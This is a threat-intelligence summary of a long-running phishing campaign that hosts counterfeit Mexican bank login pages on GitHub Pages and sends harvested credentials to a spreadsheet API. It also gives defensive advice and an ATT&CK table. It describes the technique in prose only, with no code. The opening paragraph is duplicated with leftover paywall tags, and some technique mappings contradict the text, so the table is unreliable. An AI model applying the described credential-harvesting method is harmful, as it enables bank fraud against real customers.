EXECUTIVE SUMMARY
The campaign is attributed to a financially motivated threat group that has built a modular phishing infrastructure focused on Mexico's banking and finance sector. Using the trusted reputation of GitHub Pages, the actors host counterfeit login portals that imitate at least a dozen institutions. The operation has persisted for several years, indicating a well‐maintained service. Their primary objective is credential theft, enabling account takeover, unauthorized transactions, and resale of personal banking data.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
The campaign is attributed to a financially motivated threat group that has built a modular phishing infrastructure focused on Mexico's banking and finance sector. Using the trusted reputation of GitHub Pages, the actors host counterfeit login portals that imitate at least a dozen institutions. The operation has persisted for several years, indicating a well‐maintained service. Their primary objective is credential theft, enabling account takeover, unauthorized transactions, and resale of personal banking data.[emaillocker id="1283"]
Targeted entities span local banks, multinational subsidiaries, and related financial service providers across the region. Victims receive malicious URLs through SMS, messaging apps, or email, which direct them to GitHub‐hosted pages that faithfully replicate bank login screens. Embedded JavaScript intercepts form submissions, packages entered credentials into JSON, and forwards them via HTTPS POST to a public spreadsheet‐as‐a‐service API. Because the exfiltration endpoint resides in a cloud service, attackers avoid maintaining any dedicated servers, allowing rapid redeployment of compromised repositories after takedown.
Harvested data is stored in real‐time spreadsheets, where operators can download or forward it for account takeover, fraud, or resale on underground markets. The threat is significant because it exploits a reputable hosting platform, making malicious URLs appear legitimate and bypassing many traditional perimeter controls. Absence of a persistent backend complicates takedown, while real‐time credential exfiltration leaves little chance for victims to detect compromise before fraud occurs. Organizations should reinforce user education to recognize suspicious links, enforce multi‐factor authentication, and implement network monitoring that flags outbound POST requests to unknown spreadsheet services. Deploying web filtering, regularly reviewing domain reputation, and maintaining robust incident‐response playbooks will reduce exposure and accelerate recovery if credentials are leaked.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Resource Development | T1583.003 | Acquire Infrastructure | Virtual Private Server |
| Initial Access | T1566.002 | Phishing | Spearphishing Link |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Exfiltration | T1048.003 | Exfiltration Over Alternative Protocol | Exfiltration Over Unencrypted Non-C2 Protocol |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
REFERENCES:
reports contain further technical details:
https://www.group-ib.com/blog/gitbait-phishing-mexico-banking-finance/